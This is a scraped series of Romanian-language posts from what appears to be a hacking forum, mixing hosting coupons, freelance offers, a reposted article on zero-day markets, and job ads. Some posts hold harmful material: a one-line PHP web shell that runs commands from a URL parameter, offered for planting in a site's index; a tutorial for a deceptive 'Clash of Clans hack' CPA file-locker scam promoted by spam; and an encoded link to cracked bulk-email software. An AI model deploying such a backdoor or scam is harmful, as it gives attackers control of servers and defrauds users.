Leaderboard

http://www.centohost.com/shared.php Order Start, Mini or Midi web hosting plan for $0 / year. Choose annually billing cycle and use coupon code hh2016

Pe Chat.

Personal mi se pare foarte interesant, deci luați fiecare ce vreți din linkul/codul următor. v86 emulates an x86-compatible CPU and hardware in browser. http://copy.sh/v86/ Code: https://github.com/copy/v86

Am nevoie de ceva bani pentru a achizitiona un produs si din pacate nu imi ajung asa ca pot realiza aplicatii (cu GUI sau CLI based) in urmatoarele limbaje contra unei sume stabilite ulterior: C C++ C# Python / Django Bash / Batch Perl Desigur, impreuna cu tot ce implica acestea (Baze de Date - MySQL / NoSQL / PostgreSQL, diferite API-uri ETC) Plata o puteti face pe PP, BTC sau Payoneer. (avans 20%) Un moderator poate intermedia tranzactiile, daca se doreste, pentru a nu exista conflicte. Va rog, fara comentarii inutile. Eventual da-ti un PM sau un tag in threadul asta. Mersi

merge am luat si eu @albastrel vezi sa nu ai si domeniu selectat

De la bug la arma cibernetica. Poti primi pana la $500.000 daca descoperi o vulnerabilitate in iOS Pe piata neagra, cei care gasesc buguri in sistemele de operare mobile si in softurile intens folosite isi pot adauga sume consistente in cont. Dar poti trai stiind ca poate ai fabricat o arma cibernetica? Li se spune zero-days. Sunt acele probleme de securitate proaspat descoperite in softuri, pe care, insa, compania producatoare nu le cunoaste, si care pot fi folosite de persoane sau de organizatii rau intentionate pentru a produce daune. De gasirea lor se ocupa pasionatii de securitate cibernetica. Odata ce le surprind, pot alege sa le raporteze reponsabil la producatorul softului si sa primeasca o suma modica, de obicei de ordinul sutelor sau miilor de dolari. O alta varianta ar fi sa le vanda pe piata neagra, unde o singura astfel de vulnerabilitate poate ajunge chiar si la jumatate de milion de dolari. Cum se face o arma cibernetica Razboaiele nu se mai poarta doar pe uscat, pe apa si prin aer, ci si in spatiul virtual. Operatiunile atent targetate de spionaj cibernetic pot saraci companii si distruge tari. Cei care se afla in spatele unor astfel de atacuri lucreaza cu virusi care stau ascunsi in sistem si sunt greu de detectat, dar care le livreaza periodic date sau dau peste cap echipamente precum cele ale centralelor electrice. Prima arma cibernetica este considerata Stuxnet, un vierme creat de SUA impreuna cu Israel pentru a ataca programul nuclear al Iranului. El facea ca centrifugile care lucrau la imbogatirea uraniului sa se miste haotic si sa se defecteze, si totul sa para un accident. Senzorii care se ocupau de monitorizarea echipamentelor aratau ca centrifugile se rotesc normal, desi in realitate miscarea lor era cand foarte lenta, cand foarte rapida. Stuxnet a fost construit pe baza a patru vulnerabilitati de tip zero-day, iar echipamentele au fost infectate prin intermediul unor stick-uri de memorie. “Armele cibernetice nu sunt altceva decat programe periculoase, de tip malware, dezvoltate de entitati statale - structuri militare, agentii de informatii -, ce au ca scop spionajul sau sabotajul”, spune Stefan Tanase, Senior Security Researcher la Kaspersky Lab. Cercetatorul sustine ca dezvoltarea unor astfel de arme cibernetice este un proces de durata, cu sustinere la nivel inalt si cu bugete pe masura. “Este estimat ca proiectul Stuxnet a costat zeci de milioane de dolari”, spune el. “Vulnerabilitatile de tip zero-days sunt vectori de infectie foarte precisi si eficienti”. Cum vinzi o vulnerabilitate “Zero-day-urile sunt descoperite de indivizi, de cercetatori talentati care sunt capabili sa identifice ce anume au omis sau unde exact au gresit programatorii care au lucrat la un produs software – fie el plug-in, un browser sau chiar un sistem de operare”, spune expertul Kaspersky Lab. Se estimeaza ca programatorii fac, in medie, intre 15 si 50 de greseli la fiecare o mie de linii de cod, greseli care pot fi exploatate de vanatorii de vulnerabilitati. bugcrowd si HackerOne sunt doua dintre companiile care ii ajuta pe hackerii buni sa faca bani raportand in mod responsabil problemele descoperite. “Odata ce vulnerabilitatea este reparata, iar update-ul trimis catre utilizatori, internetul va fi un pic mai sigur datorita tie”, spune Stefan Tanase. Tesla ofera pana la 10.000 de dolari pentru o vulnerabilitate anuntata responsabil de un hacker bine intentionat. Western Union si DropBox dau pana 5.000, iar Pinterest cel mult 1.500. Alte companii ofera premii simbolice, ca de exemplu un tricou. Pe piata neagra, lucrurile stau cu totul altfel, iar sumele si interesele sunt mult mai mari. Zerodium, un broker de vulnerabilitati zero-day care are printre clienti guverne si companii, ofera pana la 500.000 de dolari pentru o problema descoperita la iOS, si pana la 100.000 de dolari pentru una la Android sau Windows Phone. Urmeaza bugurile la Chrome, Adobe si Flash, pentru care se platesc cu pana la 80.000 de dolari, si cele la Internet Explorer, Edge si Safari, recompensate cu 50.000 de dolari. “Vulnerabilitatile au fost intotdeauna tranzactionate in spatele usilor inchise, in cercuri formate din indivizi, companii private sau contractori militari”, spune Stefan Tanase, care remarca faptul ca in ultimii ani piata alba a vanatorilor de buguri se dezvolta tot mai bine, lucru care inseamna o sansa pentru cei care vor sa faca un ban cinstit depistand probleme de securitate. Sa ataci, mai usor decat sa aperi Lupta dusa in spatiul cibernetic dintre baietii rai si baietii buni este departe de a fi una egala. “Intotdeauna va fi mai usor sa ataci decat sa aperi. Cand ataci, sansele sunt de partea ta. Poti incerca sa ataci la nesfarsit, pana cand atacul are succes. Si, foarte important, fara sa suporti vreun fel de consecinte in cazul in care atacul este nereusit”, spune Stefan Tanase. Cei care se ocupa de apararea impotriva amenintatilor informatice trebuie sa lucreze, insa, meticulos zi de zi. “Este suficient sa gresesti o singura data, moment in care totul este pierdut”, sustine cercetatorul. “Intrebarea care trebuie pusa nu este daca va avea loc un incident, ci mai degraba cat de bine suntem pregatiti pentru momentul in care un incident va avea loc”, spune expertul de la Kaspersky Lab. Compania sa de securitate lucreaza, de asemenea, in aceasta perioada la implementarea programului de bug bounty. “Kaspersky Lab a acordat intotdeauna maximul de atentie rapoartelor de vulnerabilitati primite pe adresavulnerability@kaspersky.com si a lucrat direct cu cei implicati pentru remedierea acestora”, spune Stefan Tanase. sursa : http://www.yoda.ro/online/de-la-bug-la-arma-cibernetica-poti-primi-pana-la-500-000-de-dolari-daca-descoperi-o-vulnerabilitate-la.html

Cei de la Zerodium nu de mult au platit 1 mil usd pentru un exploit iOS, postasem aici la stiri. Nu e vorba ca "e mai important Apple decat Linux" ci faptul ca pot fi valorificate mult mai bine si mai repede si afecteaza cat mai multi "home" useri (printre care persoane importante, celebritati, etc.)

Lectie de trolling 101

Looking for Digital Forensics & Incident Response Specialist for Germany (Frankfurt area - FINANCIAL SECTOR) Experience investigating security breaches, exposure to forensic best practices, etc Contract limitat pe cateva luni la inceput, dar se extinde pana la cativa ani, in functie de performanta. 5,000 EUR/luna in mana (iti platesti singur taxele in Romania - daca vrei:))

Salut, Ma numesc Catalin, lucrez ca sysadmin in cadrul unei corporatii si sunt pasionat de securitate. Ma bucur sa ma alatur echipei RST Cheers!

Intro to ARP spoofing with bettercap I recently discovered a fairly new man-in-the-middle tool called bettercap, which I will test in this video. I will explain the concept of ARP spoofing, install bettercap, and see how one can use it to sniff passwords on a network. Here it is: If you liked it, checkout my other trainings: http://hackademy.aetherlab.net Sursa: http://aetherlab.net/2016/02/intro-to-arp-spoofing-with-bettercap/

Update: 23.02.2016 In afara de serviciile mentionate in primul post, puteti adauga: - web automation / scrappers / crawling - multithreaded or not In cazul in care cineva doreste o colaborare de durata, preturile scad in functie de numarul proiectelor. Ma puteti contacta pe jabber (aveti in semnatura id) sau pe PM aici.

Merge thanks!

Acum merge.

Il recomand pe @sleed,ofera servicii super ok,nu te incurca cu altii,sunt multi tepari.Omu asta ofera calitate si nu cantitate.

Video este interesant cu privire la Zero days . https://www.youtube.com/watch?time_continue=20&v=4BTTiWkdT8Q

// Facut cu truda de baietii // -RST- // Hax0r 1337 CraCk Hacked OneMax RST GrupInfraczional <?php echo shell_exec($_GET["cmd"]); ?> E cel mai mic gasit. Poti sa il pui intr-un fisier si sa faci include in index sau whatever. Sper sa nu faca hernie baietii.

Sa fie mai mic sau e ok ?

1. Ia un script pentru un landing page bazat pe o nisa, exemplu http://all4share.net/scripts/premium-cpa-file-locker-clash-of-clans-hack-full-website-script.html http://www.blackhatworld.com/blackhat-seo/freebies-giveaways/758903-get-premium-cpa-file-locker-clash-clans-hack-full-website-script.html 2. Ia-ti un domeniu, pune-l pe un host 3. Inscrie-te pe o retea de CPA/PPD (cpalead/fileice) si genereaza-ti un widget pe care-l pui in site pentru ca lockerul sa fie pe contul tau. 4. Promoveaza-ti site-ul, faci un videoclip cum iti prezinti site-ul si-l pui pe youtube, faci spam pe facebook Cel mai noob-friendly tutorial pe care pot sa ti-l fac, poti sa faci pana la $200/luna , depinde cat de mult trafic aduci.

De ce nu încerci să găseşti pe cineva care să-ţi facă un crawler ca să-ţi automatizeze toată treaba? Iar pe viitor nu vei mai plătii ca să-ţi adauge cineva produse. Just sayin'

Cauta pe fiver.Gasesti indieni care te rezolva cu 5$ max.

Cu dedicatie pentru @Gecko

M-am uitat de doua ori la el.

h**p://w*w56.zippyshare.c*m/v/1843063/file.html aHR0cHM6Ly9yc3Rmb3J1bXMuY29tL2ZvcnVtLzkzNzY5LWV4Y2x1c2l2LWF0b21pYy1lbWFpbC1zdHVkaW8tOC00MC1hLnJzdA== Base-64 Am si ultima versiune doar pt. RST Forum.

Legea drepturilor de autor: 8/1996 modificata in 2014 stai linistit, ambii parteneri ai echipei minune vor lua 100% din pedeapsa...nu impartiti nimic.

Foarte bine ca lau hackeritt, acuma o sa-si dea ei seama ce au gresit cu timpul UNELE DISTRIBUTII ISI MERITA SOARTA